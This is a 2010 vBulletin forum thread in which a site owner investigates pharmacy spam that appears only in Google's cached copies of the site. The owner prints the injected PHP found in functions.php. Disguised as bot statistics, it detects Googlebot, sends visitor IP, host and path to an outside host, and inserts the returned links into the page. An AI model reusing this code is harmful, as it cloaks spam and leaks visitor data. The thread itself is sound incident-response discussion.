It seems my website has been hacked. Weird google cache hack.

**glennybee** · Mon 22 Nov '10, 12:09pm

The links are on your /forums/index.php page too. I would open a ticket with your host if it's a managed server and ask them to check it out.

Search the database in myphpadmin using keywords from the footer, it might be the result of a sql injection. I can't think of anything else.

**Cobra SA** · Mon 22 Nov '10, 12:31pm

Originally posted by glennybee

The links are on your /forums/index.php page too. I would open a ticket with your host if it's a managed server and ask them to check it out.

Search the database in myphpadmin using keywords from the footer, it might be the result of a sql injection. I can't think of anything else.

good idea I didn't think of searching the database, thanks
I just did a search on "xanax" and "clonazepam" but not a single result.

I'll take your advice and open a ticket with my host. But if anyone knows this type of hack please let me know.

**Alfa1** · Mon 22 Nov '10, 12:33pm

I would also consider whatever addons you have running. Especially if anything concerns the footer. Try turning the hook system off.
If that doesnt work, change all your passwords, contact your host, download a clean zip of vbulletin 3.8.4 and after extracting upload the files to your site. Check if that helps. If it does, then upgrade to the latest version.
If it doesnt Id consider to contact IB.

**Paul M** · Mon 22 Nov '10, 2:27pm

Check your actual php (and js) files on the server.

**Cobra SA** · Tue 23 Nov '10, 2:53am

Originally posted by Paul M

Check your actual php (and js) files on the server.

I have downloaded all php js xml html ini files from my server.
I opened them all at once in ultraedit, and searched them all for drug words like xanax, clonazepam... and ultraedit didn't find any match.

Nothing in templates and phrases either.

**Cobra SA** · Tue 23 Nov '10, 5:12am

Just so you know, I will post the progress of my ticket with my host.

Originally posted by Cobra SA

Hello,

My website has been hacked.
The hack only appears in the footer of the google cache of my website pages.

http://webcache.googleusercontent.co...&ct=clnk&gl=en

Without google cache I would never have noticed it.

I don't know what the hackers changed or how they proceeded.
I downloaded and searched all .php, .js, .xml, .html, .ini files and I found nothing related to drugs.
Even in the web source code of my pages there is nothing, this is really strange.

Please look into this, this is possibly a hack in the server side.

Best regards,

My Name.

Originally posted by My host

Hello,

No, this is impossible. In this case it'll affect all server's accounts.

If you can't find anything.
Please refer to Google via the link http://www.google.com/webmasters/tools/ so that reiterated that Google would rescan your page again.

Please let us know if you need more help.
Thank you.

- -
Kind regards,
Kenny ***
My host

I will now proceed in taking their advice and asking google to rescan. Will let you know how things are going.

EDIT: ticket opened at google/webmasters, damn they say it can take weeks, and they will not necessarily reply individually.

**Cobra SA** · Tue 23 Nov '10, 7:47am

Interesting thing to note, someone at the google forums suggested that the code might only show up when the visitor is googlebot and it appears this is right, bing and yahoo cache have no trace of the malicious code:

http://cc.bingj.com/cache.aspx?q=mug...020bd,787e0e2c

http://74.6.146.127/search/cache?ei=...IpnLrLd6W_Qg--

Can that help me locate the malicious code? Maybe using the drugs as key word to search the malicious code was not the good strategy, maybe the malicious code inserts the drug links inside my web page on the fly whenever googlebot is visiting.

Anyone could point me how to look for the malicious code with these new infos?

**Cobra SA** · Tue 23 Nov '10, 8:35am

I checked the date of the files on my FTP and one mainstream vB file is newer than all other files, this is pretty suspicious.

The file is includes/functions.php and I don't see why its date is not the same as other mainstream vB php files.

Besides I found some code related to google bot inside. Is this normal code?

Code:

    // This code use for global bot statistic
    if(!(($nPos = strpos($vartext, '</body>')) === false) || !(($nPos = strpos($vartext, '</body>')) === false))
    {
        $sBonInfo = '';
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        $stCurlHandle = NULL;
        if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics            
            $stCurlHandle = curl_init('http://safebotslogs.net/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look'])); 
        } else
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics            
            $stCurlHandle = curl_init('http://safebotslogs.net/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look'])); 
        }
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        $sBonInfo = curl_exec($stCurlHandle); 
        curl_close($stCurlHandle); 
        
        $vartext = substr_replace($vartext, $sBonInfo, $nPos, 0);
    } // Statistic code end
    
    $output = process_replacement_vars($vartext);

    if ($vbulletin->debug AND function_exists('memory_get_usage'))
    {
        $output = preg_replace('#(<!--querycount-->Executed <b>\d+</b> queries<!--/querycount-->)#siU', 'Memory Usage: <strong>' . number_format((memory_get_usage() / 1024)) . 'KB</strong>, \1', $output);
    }

**Alfa1** · Tue 23 Nov '10, 10:33am

That seems fishy. Others have experienced the same with code that referenced safebotslogs.net
Now the question is: how did this get in your functions.php ?

I'd change all your ftp password. Scan all computers that have ftp access to your site. Deny access to any PC that does not need to have access. (white-listed IPs only)
Then download a fresh version of vb. Upload that.
Upgrade to latest vb3 version.

**Paul M** · Tue 23 Nov '10, 11:19am

No, that is not normal, and certainly not part of vbulletin.

**Cobra SA** · Tue 23 Nov '10, 10:30pm

Do you think the hackers could edit the functions.php by other means than FTP access, like exploiting a security flaw in vB 3.8.4 or vBAdvanced 3.1.0 ?

I really can't find the slightest malware on my system. It is fully scanned daily by KIS 2011 and Windows Defender, plus I always scan a new exe at virustotal.com before using it.

EDIT: My forum was hacked on 26/10/2010, I searched Kaspersky logs and check this out.

Code:

26/10/2010 11:04:36    INSTALLFLASHPLAYER.EXE    Application Control        Application placed in group        Low Restricted    Heuristically calculated threat rating     
28/10/2010 11:19:35    INSTALLFLASHPLAYER.EXE    Application Control        Application placed in group        Trusted    Signed by the digital signature of entrusted manufacturers    
31/10/2010 16:04:30    INSTALLFLASHPLAYER.EXE    Application Control        Application placed in group        Low Restricted    Heuristically calculated threat rating

Stupid Kaspersky allowed that INSTALLFLASHPLAYER.EXE without a digital signature to execute. >_< You can see that on 28/10, another INSTALLFLASHPLAYER.EXE executed itself but that one had a trusted digital signature.

Now the question is how to remove the trojans it may have installed if neither Kaspersky nor Windows Defender can detect it. I tried an online scan at bitdefender but it didn't find anything.

**Cobra SA** · Wed 24 Nov '10, 4:39am

I found a trace of the hacked in my ftp access log:

Mon Oct 25 09:50:39 2010 0 213.5.68.141 29421 /home/*domain*/public_html/forums/includes/cron/banners.php a _ i r *ftp-login* ftp 1 * c

I searched the IP 213.5.68.141 and I found two other people who got their FTP hacked by this IP

http://www.ipillion.com/ip/213.5.68.141

I am currently asking my host to restrict my FTP access to my IP range and ban that IP.

I will also ask google to blacklist http://safebotslogs.net

**Alfa1** · Thu 25 Nov '10, 2:15am

Its always a good idea to only allow whitelisted IPs to ftp, or any other service that your members do not need. There are a mass of services that no one should have access to.
I assume you have changed all passwords and double checked all files on your server for irregularities?

**Cobra SA** · Sun 28 Nov '10, 2:51am

The hacker added the file /forums/includes/cron/banners.php
to my FTP. Is is possible it could have infected the database?
In that case how can I clean up the database?

vBulletin 3 End of Life

It seems my website has been hacked. Weird google cache hack.

It seems my website has been hacked. Weird google cache hack.

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment